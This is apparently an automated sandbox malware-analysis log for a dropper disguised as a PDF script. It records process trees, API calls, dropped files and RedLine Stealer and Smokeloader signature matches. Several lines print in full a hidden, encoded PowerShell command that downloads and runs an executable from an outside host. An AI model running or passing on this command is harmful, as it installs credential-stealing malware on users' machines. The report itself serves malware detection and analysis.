      Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401529
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402FFA RtlCreateUserThread,NtTerminateProcess,5_2_00402FFA
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401541
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401545
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401553
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402379 NtQuerySystemInformation,5_2_00402379
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040237B NtQuerySystemInformation,5_2_0040237B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040332A LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtEnumerateKey,5_2_0040332A
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401534
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DB
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_004020EA NtQuerySystemInformation,5_2_004020EA
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402387 NtQuerySystemInformation,5_2_00402387
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402397 NtQuerySystemInformation,5_2_00402397
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040239B NtQuerySystemInformation,5_2_0040239B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040239E NtQuerySystemInformation,5_2_0040239E
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401529
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00402FFA RtlCreateUserThread,NtTerminateProcess,10_2_00402FFA
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401541
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401545
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401553
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00402379 NtQuerySystemInformation,10_2_00402379
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_0040237B NtQuerySystemInformation,10_2_0040237B
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_0040332A LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower,10_2_0040332A
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401534
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014DB
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_004020EA NtQuerySystemInformation,10_2_004020EA
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00402387 NtQuerySystemInformation,10_2_00402387
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00402397 NtQuerySystemInformation,10_2_00402397
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_0040239B NtQuerySystemInformation,10_2_0040239B
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_0040239E NtQuerySystemInformation,10_2_0040239E
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00418A705_2_00418A70
      Source: C:\Windows\explorer.exeCode function: 9_2_00B228D09_2_00B228D0
      Source: C:\Windows\explorer.exeCode function: 9_2_088228D09_2_088228D0
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_00418A7010_2_00418A70
      Source: C:\Users\user\AppData\Roaming\wbfgshsCode function: 10_2_007ED20D10_2_007ED20D
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\oBuf.exe F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\wbfgshs F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
      Source: 3312.PDF.wsfInitial sample: Strings found which are bigger than 50
      Source: 0000000A.00000002.1937502143.00000000007ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 0000000A.00000002.1937393700.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: oBuf.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: wbfgshs.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@9/5@3/2
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_009106F7 CreateToolhelp32Snapshot,Module32First,5_2_009106F7
      Source: C:\Windows\explorer.exeCode function: 9_2_00B23678 CoCreateInstance,9_2_00B23678
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wbfgshsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gosykqu.mc1.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user\AppData\Local\Temp\oBuf.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wbfgshs C:\Users\user\AppData\Roaming\wbfgshs
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user\AppData\Local\Temp\oBuf.exe" Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
